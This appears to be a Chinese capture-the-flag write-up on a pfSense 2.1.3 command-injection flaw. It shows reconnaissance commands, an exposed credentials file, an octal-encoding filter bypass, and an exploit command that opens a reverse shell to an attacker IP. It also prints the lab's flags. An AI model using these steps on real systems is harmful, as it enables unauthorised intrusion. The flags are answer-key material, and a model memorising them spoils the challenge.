pfSense防火墙RCE漏洞分析与利用教学文档<\/h1>

1. 漏洞概述<\/h2>
pfSense防火墙2.1.3版本中的`status_rrd_graph_img.php<\/code>页面存在命令注入漏洞。该漏洞源于对graph<\/code>参数处理不当，虽然进行了正则表达式过滤，但未移除管道字符(|<\/code>)，攻击者可通过八进制编码绕过过滤，实现任意命令执行。<\/p>`

2. 信息收集阶段<\/h2>
2.1 目标识别<\/h3>

IP地址: 10.10.10.60<\/li>
开放端口:

TCP 80 (HTTP)<\/li>
TCP 443 (HTTPS)<\/li>
<\/ul>
<\/li>
<\/ul>
2.2 服务扫描<\/h3>
使用Nmap进行扫描:<\/p>
nmap -p- 10.10.10.60 --min-rate 1000<\/span> -sC -sV
<\/span><\/span><\/code><\/pre>扫描结果:<\/p>

80\/tcp: lighttpd 1.4.35 (重定向到HTTPS)<\/li>
443\/tcp: lighttpd 1.4.35 (SSL\/TLS)

SSL证书信息:

通用名称: Common Name<\/li>
组织: CompanyName<\/li>
地区: Somewhere<\/li>
国家: US<\/li>
有效期: 2017-10-14 至 2023-04-06<\/li>
<\/ul>
<\/li>
<\/ul>
<\/li>
<\/ul>
2.3 目录枚举<\/h3>
使用Gobuster进行目录扫描:<\/p>
gobuster dir -u "https:\/\/10.10.10.60\/"<\/span> -w \/usr\/share\/seclists\/Discovery\/Web-Content\/raft-small-words.txt -x html,txt,php -b 404,403 -t 50<\/span> -k
<\/span><\/span><\/code><\/pre>发现敏感文件:<\/p>
curl "https:\/\/10.10.10.60\/system-users.txt"<\/span> -k
<\/span><\/span><\/code><\/pre>内容:<\/p>
username:rohit
password:pfsense
<\/code><\/pre>
3. 漏洞分析<\/h2>
3.1 漏洞定位<\/h3>
通过SearchSploit查找pfSense相关漏洞:<\/p>
searchsploit -w PFSense 2.1.3
<\/span><\/span><\/code><\/pre>发现漏洞存在于status_rrd_graph_img.php<\/code>页面，该页面在处理graph<\/code>参数时存在命令注入漏洞。<\/p>
3.2 漏洞原理<\/h3>

漏洞文件: status_rrd_graph_img.php<\/code><\/li>
漏洞参数: graph<\/code><\/li>
过滤机制: 使用正则表达式过滤非法字符<\/li>
绕过方式: 管道字符(|<\/code>)未被过滤，可通过八进制编码(\174<\/code>)绕过<\/li>
<\/ul>
4. 漏洞利用<\/h2>
4.1 利用准备<\/h3>

攻击机IP: 10.10.16.14<\/li>
监听端口: 10032<\/li>
获取的凭据:

用户名: rohit<\/li>
密码: pfsense<\/li>
<\/ul>
<\/li>
<\/ul>
4.2 利用脚本<\/h3>
使用Python编写的漏洞利用脚本(exp.py):<\/p>
python3 exp.py --rhost 10.10.10.60 --lhost 10.10.16.14 --lport 10032<\/span> --username rohit --password pfsense
<\/span><\/span><\/code><\/pre>4.3 利用过程<\/h3>

使用获取的凭据登录pfSense系统<\/li>
通过status_rrd_graph_img.php<\/code>页面注入命令<\/li>
使用八进制编码绕过过滤<\/li>
建立反向shell连接<\/li>
<\/ol>
5. 后渗透阶段<\/h2>
5.1 获取用户标志<\/h3>
User.txt: 8721327cc232073b40d27d9c17e7348b
<\/span><\/span><\/code><\/pre>5.2 获取root标志<\/h3>
Root.txt: d08c32a5d4f8c8b10e76eb51a69f1a86
<\/span><\/span><\/code><\/pre>6. 防护建议<\/h2>

升级到最新版本的pfSense<\/li>
对用户输入进行严格过滤，特别是特殊字符<\/li>
实施最小权限原则，限制Web服务的执行权限<\/li>
监控系统日志，检测异常命令执行行为<\/li>
定期进行安全审计和漏洞扫描<\/li>
<\/ol>
7. 总结<\/h2>
该漏洞展示了Web应用程序中输入验证不足可能导致的安全风险。通过精心构造的输入，攻击者可以绕过过滤机制，执行任意系统命令。防御此类攻击需要多层防护措施，包括严格的输入验证、输出编码、最小权限原则和持续的安全监控。<\/p>